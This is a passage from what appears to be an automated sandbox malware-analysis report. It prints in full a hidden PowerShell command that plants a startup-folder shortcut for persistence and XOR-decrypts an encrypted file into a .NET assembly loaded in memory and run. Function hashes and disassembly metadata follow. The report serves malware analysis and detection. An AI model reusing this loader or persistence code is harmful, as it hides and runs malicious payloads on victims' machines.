15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
              Imagebase:0x7ff77d8b0000
              File size:273920 bytes
              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Chronological Activities

              Analysis Process: powershell.exe PID: 5852 Parent PID: 68

              General

              Start time:10:08:50
              Start date:03/12/2020
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:powershell -w hidden -command '$abab188938847d9e028b83169bd97=$env:appdata+'\microsoft\windows\start menu\programs\startup\add375f568547c9bc8c38d92878f1.lnk';if(-not(test-path $abab188938847d9e028b83169bd97)){$a1fe836cd2f4a584c8b26df3c899e=new-object -comobject wscript.shell;$a887c3fc4114a6ae35adcfe97686a=$a1fe836cd2f4a584c8b26df3c899e.createshortcut($abab188938847d9e028b83169bd97);$a887c3fc4114a6ae35adcfe97686a.windowstyle=7;$a887c3fc4114a6ae35adcfe97686a.targetpath='c:\users\u055610\appdata\roaming\microsoft\phlk\iqfpdjey.cmd';$a887c3fc4114a6ae35adcfe97686a.save();};if((get-process -name '*powershell*').count -lt 15){$a41841141c743b8d10df14c793537='XjFIS3leTXtiQ15QYVBvXlBZLT5AVDh9Zl5TcCRWXm9OTG9eUWdZNUB9O01mQHVRKXBAcnRhUztoZClObn4xcF5vRXAlQHdCXnxAdm9BKEB9UCFgXjBja0Feb15eWUBSWCo2QHZWV2VAcypCKkB1ailDQHV7aH1Ac1BaI0Byc2gxXk9KfDNeUGBUeF5ReEFkQFIqe1RAfVpHfF5vT15MPWJWdTdqR0xNOG1XSHxWem43LSlsWV5BPXVBe3Axem05P05zK1h8eHJvRXk=';$afc49a7db894a1989bc60a8b4dcd7=[system.io.file]::readallbytes([system.text.encoding]::utf8.getstring([system.convert]::frombase64string('QzpcVXNlcnNcVTA1NTYxMFxBcHBEYXRhXFJvYW1pbmdcTUlDUm9zT2ZUXHBobGtcUEhVTklwUkFhcW5zdEd2TER3S09NWlFyeG9lRlltV3lsZmd6U2NWa0VYYml1SmpkQ0JoVA==')));for($a0bf2735f83489b6c01ebc52dd3ad=0;$a0bf2735f83489b6c01ebc52dd3ad -lt $afc49a7db894a1989bc60a8b4dcd7.count;){for($ad3c9c588084759dffa6395ab35e5=0;$ad3c9c588084759dffa6395ab35e5 -lt $a41841141c743b8d10df14c793537.length;$ad3c9c588084759dffa6395ab35e5++){$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad]=$afc49a7db894a1989bc60a8b4dcd7[$a0bf2735f83489b6c01ebc52dd3ad] -bxor $a41841141c743b8d10df14c793537[$ad3c9c588084759dffa6395ab35e5];$a0bf2735f83489b6c01ebc52dd3ad++;if($a0bf2735f83489b6c01ebc52dd3ad -ge $afc49a7db894a1989bc60a8b4dcd7.count){$ad3c9c588084759dffa6395ab35e5=$a41841141c743b8d10df14c793537.length}}};[system.reflection.assembly]::load($afc49a7db894a1989bc60a8b4dcd7);[d.m]::run()}'
              Imagebase:0x7ff785e30000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Chronological Activities

              Disassembly

              Code Analysis

              Reset < >

                Analysis Process: powershell.exe PID: 5852 Parent PID: 68 powershell.exeCOMMON

                Executed Functions

                Function 00007FFAEEB0388E, Relevance: 5.9, Strings: 4, Instructions: 906COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: :$H6?w$P6?w$T_L;
                • API String ID: 0-1244797730
                • Opcode ID: 401044e9cd5d9a6d6a19ac1ab00cc019a3d7bac44b8b59b8350db4e8c33ccf5d
                • Instruction ID: 7f7dba8680aefc9deadc54e59437a5f8b53197a392eb8488ca09058c3b7ca108
                • Opcode Fuzzy Hash: 401044e9cd5d9a6d6a19ac1ab00cc019a3d7bac44b8b59b8350db4e8c33ccf5d
                • Instruction Fuzzy Hash: 10424971A0DB894FE7A5AB6D88A87B57BE1EF57210B09C1FBD04DC7193D948AC05C382
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB03FA8, Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: `J$X6?w
                • API String ID: 0-3043315224
                • Opcode ID: cd587e3acf3e924dc5d709129ef7328e00ff1b8180111677abe0586ef19d7db7
                • Instruction ID: 517ae2e7b75313e7f4f853345c5c85ca93e87fa7286f9a884196a405cdc0662d
                • Opcode Fuzzy Hash: cd587e3acf3e924dc5d709129ef7328e00ff1b8180111677abe0586ef19d7db7
                • Instruction Fuzzy Hash: C751C19294EBC65FE392A7B858B52647FA19F5321070E81FBD089CB1D3E8486D0A8353
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEA32437, Relevance: .4, Instructions: 435COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9dbacff96b268e95db9ce310f42538fb6a8a43955027d8b39759fecf112ed307
                • Instruction ID: db0650ef5c67548dca5d436055fa9e4529ef9f753287eaa55bc286d3599dbfa5
                • Opcode Fuzzy Hash: 9dbacff96b268e95db9ce310f42538fb6a8a43955027d8b39759fecf112ed307
                • Instruction Fuzzy Hash: 1951593161C7854FD746EB28C8915A57BE1EF5732071500FED08AC72A3D919A84AC7A2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB0822D, Relevance: .4, Instructions: 427COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6d8e43c8029dcf7a49e3d40c1801acdf2e87e625f718c4bbc72dd5759198e8dc
                • Instruction ID: d78d33a4c2c9da35bf025e4f97c5a3591c3be8f2b3623b007a69b11aabae9ebd
                • Opcode Fuzzy Hash: 6d8e43c8029dcf7a49e3d40c1801acdf2e87e625f718c4bbc72dd5759198e8dc
                • Instruction Fuzzy Hash: 17C14A7180EBC95FD3569729D8656B57FA4EF47320B0AC1FBD08CC7093DA98A906C392
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB01580, Relevance: .2, Instructions: 215COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15fea9ba368c0e5478345c3bcebd537ae1f3453c591d7a805e17d9c5579c07a0
                • Instruction ID: a8b6af34942690f7eb29608cf833b2617ea12c0a796106bb62fc648ec7be2f07
                • Opcode Fuzzy Hash: 15fea9ba368c0e5478345c3bcebd537ae1f3453c591d7a805e17d9c5579c07a0
                • Instruction Fuzzy Hash: 93610C72A0DA864FE39AEBA89CA62B87BD1EF56210F09C0FDD04DC71C7DD596C054386
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB01861, Relevance: .2, Instructions: 209COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6dea606d5596537234e67015a04b5a832b5f74800223da7a947a411094ff8e08
                • Instruction ID: 8c998c3a450995be47b44cad9120373568ef6b9345e956068211595c8f159bf4
                • Opcode Fuzzy Hash: 6dea606d5596537234e67015a04b5a832b5f74800223da7a947a411094ff8e08
                • Instruction Fuzzy Hash: 5C51083180D7C84FD75ADB2898956E47FE0EF97320F0981EFE089C7193CA64690AC792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB015BA, Relevance: .2, Instructions: 200COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 733e13f83208026e3a2b5da0336a4527644b3a06dffd07c8188b389e718a58c7
                • Instruction ID: 1df0e2d5f2752b0375b8451d625b7b340a0d98d2fc21dc581280def26f0a509c
                • Opcode Fuzzy Hash: 733e13f83208026e3a2b5da0336a4527644b3a06dffd07c8188b389e718a58c7
                • Instruction Fuzzy Hash: 8A511B72A0DB864FE359ABA8DCA62B47BE1EF96200F09C0FDD44D87183DD586D054782
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB01898, Relevance: .2, Instructions: 174COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7451322d05a80a2badffdef6deebe37a0ae7634384190f806a79989c169d8cda
                • Instruction ID: 3afa9cae73026624c06951e6216b16a91839429cadb4cac47f1e373b0268c593
                • Opcode Fuzzy Hash: 7451322d05a80a2badffdef6deebe37a0ae7634384190f806a79989c169d8cda
                • Instruction Fuzzy Hash: 1351273240D7C84FD75A9B6898556E47FF0EF87320F0981EFE089C7193DA64690AC792
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB082F4, Relevance: .2, Instructions: 168COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8c2e6d7549fd46f346c60d75c68c014ecb0d5fb593c62bbd1a6c2529039ed71b
                • Instruction ID: 81a5678d28e8741a0e089408e272a4566ec12990e58b9adb1e743d97324aae23
                • Opcode Fuzzy Hash: 8c2e6d7549fd46f346c60d75c68c014ecb0d5fb593c62bbd1a6c2529039ed71b
                • Instruction Fuzzy Hash: AD41197290DB8A4FD7969B2DD8A13747BE1EF97210B0AC1FAD04CC7193D994BD068342
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEA31894, Relevance: .1, Instructions: 85COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 09e98cf9bafce5000fe74bbb12da92bf43c4ce7d353b5bd1cb494c1eec4d23d3
                • Instruction ID: 641d6ac53cbaf133ce6bd5c285515af84f10b4ac55561127253a856959897b5c
                • Opcode Fuzzy Hash: 09e98cf9bafce5000fe74bbb12da92bf43c4ce7d353b5bd1cb494c1eec4d23d3
                • Instruction Fuzzy Hash: E121D63065CB498FD749EF18D0917B9B7E1FF96314F1009BDE08EC7592DA66A882C702
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEA32E39, Relevance: .1, Instructions: 82COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d277c4fc0f34dfdb50ccfd62738972f75bfec53a33a7c348e7a3306bfd882037
                • Instruction ID: a88342773431932eb92f3e82d411f9557aa7eb03a7080a1276c2adedc1ece7b7
                • Opcode Fuzzy Hash: d277c4fc0f34dfdb50ccfd62738972f75bfec53a33a7c348e7a3306bfd882037
                • Instruction Fuzzy Hash: 83211B31A1891D8FDF94EF58C482EED7BA2FF69300F554169D40DD3295CA24E882CBC1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEA31DA2, Relevance: .1, Instructions: 68COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d82874f8c65ca8ebca230af8f0002299d06c80e6f7fd10e3a0de0052d678485a
                • Instruction ID: 36c808ba38cd8c2bd577508ea2629f5f4c31a211ff2d7e8d1b4d4226f6f03700
                • Opcode Fuzzy Hash: d82874f8c65ca8ebca230af8f0002299d06c80e6f7fd10e3a0de0052d678485a
                • Instruction Fuzzy Hash: B001D63131CA094BEB4CEB1CE4522F473C1EB96361B2001AED84ACB297DC16A8838782
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB06DFD, Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 52f00fd48cb94c508fc8e91ca2c64d1533fbcbe9e57dacdbb3444d3bd8302e05
                • Instruction ID: e1f13e850388e1becb0c45e4acb20c870fb193ebf857361a0b11f36c355a9097
                • Opcode Fuzzy Hash: 52f00fd48cb94c508fc8e91ca2c64d1533fbcbe9e57dacdbb3444d3bd8302e05
                • Instruction Fuzzy Hash: A3110872E0D7868FE745DB6DE4D56B8BB95EF1A210B15C0FEC05CCB583C91568418742
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB06DBD, Relevance: .1, Instructions: 60COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed658e5e55c944adf45569e7fc0503cf4b1a6b7e091e2d06b6d48bc4d7b8812b
                • Instruction ID: 5142a181dc2cedc871988448406900d282f8e2e4ad8c8e1950429d707ac4bd8e
                • Opcode Fuzzy Hash: ed658e5e55c944adf45569e7fc0503cf4b1a6b7e091e2d06b6d48bc4d7b8812b
                • Instruction Fuzzy Hash: 94112932A0E78A8FE745DBACF4D46B87B95EF1A210B15C0FEC04DC7583C94968058342
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEB03EAC, Relevance: .1, Instructions: 52COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242314803.00007FFAEEB00000.00000040.00000001.sdmp, Offset: 00007FFAEEB00000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeeb00000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 640299f0dfea40074fc9ced2694d1cf203824f60bc25b72e8dc582e73fcee58d
                • Instruction ID: e04292e3df9059b3a127730808abc25767801a74101fb2b9564ab6d6277d8fa2
                • Opcode Fuzzy Hash: 640299f0dfea40074fc9ced2694d1cf203824f60bc25b72e8dc582e73fcee58d
                • Instruction Fuzzy Hash: BE01A232B0DD1A4AE6E5A71DA8B93B966C2DF95250B4AC1BAD44DC3287DD4CFC0502D2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFAEEA32768, Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ce69b8577a34ac68bd65c3a00ff8005b55a0873a24b4b51b76562087e05f6ce7
                • Instruction ID: a4e109db06153ba1b9bc57d396ae53f1eaec4453e51cde4785278e0956ecaf4f
                • Opcode Fuzzy Hash: ce69b8577a34ac68bd65c3a00ff8005b55a0873a24b4b51b76562087e05f6ce7
                • Instruction Fuzzy Hash: 04F0303275C6044FDB4CAA1CF8429B973D1EB99321B00016EE48BC2696E927E8428686
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00007FFAEEA30EFA, Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.242205855.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_7ffaeea30000_powershell.jbxd
                Similarity
                • API ID:
                • String ID: 2a_^
                • API String ID: 0-2206430025
                • Opcode ID: 81d56cf8b9429242c816e59276a38beab8f30abc3c770214db4efe7d3fc5d9f3
                • Instruction ID: 211c5d01b0aa953360d658ef7d66ee33622823a361ef28abf2933413e6407b51
                • Opcode Fuzzy Hash: 81d56cf8b9429242c816e59276a38beab8f30abc3c770214db4efe7d3fc5d9f3
                • Instruction Fuzzy Hash: 22A11A67B1D7E2CBF21297AD58D31EE3FA0EF6356571B40B7D08987093E985180B42D2
                Uniqueness

                Uniqueness Score: -1.00%